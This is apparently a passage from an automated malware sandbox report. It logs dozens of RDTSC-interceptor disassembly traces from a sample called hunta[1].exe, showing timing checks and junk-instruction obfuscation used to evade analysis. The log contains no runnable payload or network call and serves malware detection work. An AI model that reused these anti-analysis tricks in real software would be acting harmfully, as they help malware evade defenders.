0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E0A second address: 5970E2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E484h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E5514DEFh 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E2E second address: 5970E32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E32 second address: 5970E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970E38 second address: 5970EBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FF2E55A2C34h 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Eh 0x0000001c movzx esi, dx 0x0000001f popad 0x00000020 mov eax, dword ptr [777265FCh] 0x00000025 jmp 00007FF2E55A2C2Dh 0x0000002a test eax, eax 0x0000002c pushad 0x0000002d pushad 0x0000002e mov dh, ch 0x00000030 mov bl, 77h 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 popad 0x00000038 je 00007FF3572D56F7h 0x0000003e pushad 0x0000003f pushad 0x00000040 movzx esi, bx 0x00000043 mov edi, 7D806BD2h 0x00000048 popad 0x00000049 push edi 0x0000004a movzx ecx, di 0x0000004d pop ebx 0x0000004e popad 0x0000004f mov ecx, eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FF2E55A2C2Dh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970EBD second address: 5970F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FF2E5514DF3h 0x0000000c and eax, 26EE5D2Eh 0x00000012 jmp 00007FF2E5514DF9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xor eax, dword ptr [ebp+08h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF2E5514DF8h 0x00000027 jmp 00007FF2E5514DF5h 0x0000002c popfd 0x0000002d mov bh, cl 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970F32 second address: 5970F6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FF2E55A2C30h 0x00000011 ror eax, cl 0x00000013 jmp 00007FF2E55A2C30h 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970F6C second address: 5970F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59701E4 second address: 5970237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF2E55A2C33h 0x00000015 sbb ecx, 2A981A3Eh 0x0000001b jmp 00007FF2E55A2C39h 0x00000020 popfd 0x00000021 movzx eax, dx 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970237 second address: 5970275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov eax, 00CC3F9Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and dword ptr [eax], 00000000h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 pushfd 0x00000018 jmp 00007FF2E5514DF4h 0x0000001d sbb cx, F998h 0x00000022 jmp 00007FF2E5514DEBh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970275 second address: 5970299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5970299 second address: 597029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 597029D second address: 59702B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593001E second address: 5930024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930024 second address: 5930056 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov si, F9AFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FF2E55A2C32h 0x00000012 push eax 0x00000013 jmp 00007FF2E55A2C2Bh 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930056 second address: 5930071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930071 second address: 5930089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930089 second address: 593008D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593008D second address: 59300D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ebx, 18AD75AEh 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FF2E55A2C2Bh 0x0000001a and esi, 23B8A65Eh 0x00000020 jmp 00007FF2E55A2C39h 0x00000025 popfd 0x00000026 popad 0x00000027 and esp, FFFFFFF8h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300D7 second address: 59300DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300DB second address: 59300DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300DF second address: 59300E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59300E5 second address: 5930129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C37h 0x00000009 sbb si, E11Eh 0x0000000e jmp 00007FF2E55A2C39h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930129 second address: 593012D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593012D second address: 5930131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930131 second address: 5930137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930137 second address: 593013D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593013D second address: 5930156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930156 second address: 593015A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593015A second address: 5930160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930160 second address: 5930166 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930166 second address: 593020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007FF2E5514DEDh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov ecx, 5CA77E43h 0x00000015 mov dl, ch 0x00000017 popad 0x00000018 push eax 0x00000019 jmp 00007FF2E5514DF2h 0x0000001e xchg eax, ebx 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 mov ebx, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 jmp 00007FF2E5514DEEh 0x0000002d mov ah, 1Dh 0x0000002f popad 0x00000030 push ebx 0x00000031 jmp 00007FF2E5514DEAh 0x00000036 mov dword ptr [esp], esi 0x00000039 jmp 00007FF2E5514DF0h 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 jmp 00007FF2E5514DF0h 0x00000046 xchg eax, edi 0x00000047 jmp 00007FF2E5514DF0h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov eax, 5FF38DC3h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593020B second address: 593022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593022D second address: 5930289 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF2E5514DF4h 0x00000008 sub ax, 1EE8h 0x0000000d jmp 00007FF2E5514DEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF2E5514DF4h 0x0000001f jmp 00007FF2E5514DF5h 0x00000024 popfd 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930289 second address: 59302DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 je 00007FF357310FACh 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 pushfd 0x00000011 jmp 00007FF2E55A2C32h 0x00000016 and ch, FFFFFFD8h 0x00000019 jmp 00007FF2E55A2C2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FF2E55A2C35h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59302DA second address: 59302DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59302DF second address: 5930368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FF357310F6Bh 0x0000000d jmp 00007FF2E55A2C36h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 jmp 00007FF2E55A2C30h 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d jmp 00007FF2E55A2C30h 0x00000022 test edx, 61000000h 0x00000028 pushad 0x00000029 mov al, C3h 0x0000002b call 00007FF2E55A2C33h 0x00000030 movzx esi, dx 0x00000033 pop edi 0x00000034 popad 0x00000035 jne 00007FF357310F65h 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF2E55A2C37h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5930368 second address: 593036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 593036F second address: 5930381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [esi+48h], 00000001h 0x0000000b pushad 0x0000000c mov eax, edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940044 second address: 5940093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF5h 0x00000009 sbb ax, 4636h 0x0000000e jmp 00007FF2E5514DF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FF2E5514DECh 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF2E5514DEAh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940093 second address: 5940097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940097 second address: 594009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594009D second address: 59400AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59400AE second address: 59400D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DF8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59400D2 second address: 5940112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF2E55A2C31h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 jmp 00007FF2E55A2C2Ah 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E55A2C37h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940112 second address: 5940118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940118 second address: 594011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594011C second address: 59401BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF2E5514DEEh 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov di, cx 0x00000013 pushad 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 popad 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF2E5514DEAh 0x00000021 and ecx, 471E2068h 0x00000027 jmp 00007FF2E5514DEBh 0x0000002c popfd 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 pushad 0x00000034 push ecx 0x00000035 jmp 00007FF2E5514DF7h 0x0000003a pop esi 0x0000003b mov bh, BDh 0x0000003d popad 0x0000003e mov esi, dword ptr [ebp+08h] 0x00000041 pushad 0x00000042 movzx esi, di 0x00000045 call 00007FF2E5514DF3h 0x0000004a push eax 0x0000004b pop edx 0x0000004c pop eax 0x0000004d popad 0x0000004e mov ebx, 00000000h 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FF2E5514DF7h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59401BC second address: 59401C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59401C2 second address: 594025E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF2E5514DF3h 0x00000012 add eax, 5990747Eh 0x00000018 jmp 00007FF2E5514DF9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FF2E5514DF0h 0x00000024 jmp 00007FF2E5514DF5h 0x00000029 popfd 0x0000002a popad 0x0000002b jmp 00007FF2E5514DF0h 0x00000030 popad 0x00000031 je 00007FF35726AF39h 0x00000037 jmp 00007FF2E5514DF0h 0x0000003c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594025E second address: 5940262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940262 second address: 5940266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940266 second address: 594026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 594026C second address: 59402E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF2E5514DF0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f jmp 00007FF2E5514DF0h 0x00000014 je 00007FF35726AEF3h 0x0000001a jmp 00007FF2E5514DF0h 0x0000001f test byte ptr [77726968h], 00000002h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov si, di 0x0000002c pushfd 0x0000002d jmp 00007FF2E5514DF9h 0x00000032 jmp 00007FF2E5514DEBh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59402E0 second address: 59402F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59402F8 second address: 59402FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59402FC second address: 5940340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF3572F8CD8h 0x0000000e pushad 0x0000000f jmp 00007FF2E55A2C38h 0x00000014 popad 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF2E55A2C37h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940340 second address: 59403FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF2E5514DECh 0x00000011 or ax, 31A8h 0x00000016 jmp 00007FF2E5514DEBh 0x0000001b popfd 0x0000001c mov ah, 60h 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 call 00007FF2E5514DF0h 0x00000026 pushad 0x00000027 popad 0x00000028 pop ecx 0x00000029 mov dx, F8B4h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 push edi 0x00000031 pop edx 0x00000032 mov dx, ax 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FF2E5514DF8h 0x0000003e or al, FFFFFF98h 0x00000041 jmp 00007FF2E5514DEBh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007FF2E5514DF8h 0x0000004d adc al, FFFFFFF8h 0x00000050 jmp 00007FF2E5514DEBh 0x00000055 popfd 0x00000056 popad 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59403FC second address: 5940400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940400 second address: 5940412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940412 second address: 5940429 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 77954804h 0x00000008 push edi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov di, ax 0x00000014 mov bl, ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940429 second address: 5940463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 mov bh, 4Ah 0x00000012 popad 0x00000013 push dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF2E5514DF1h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 5940463 second address: 5940473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1952 second address: 59A1984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF2E5514DF8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1984 second address: 59A1993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A1993 second address: 59A199B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A199B second address: 59A19AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF2E55A2C2Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A19AF second address: 59A19E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 10303324h 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF2E5514DF0h 0x00000017 or cl, FFFFFFD8h 0x0000001a jmp 00007FF2E5514DEBh 0x0000001f popfd 0x00000020 mov bx, cx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59A19E4 second address: 59A1A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FF2E55A2C2Ch 0x00000011 push esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jmp 00007FF2E55A2C37h 0x00000019 popad 0x0000001a push 0000007Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C35h 0x00000023 rdtsc
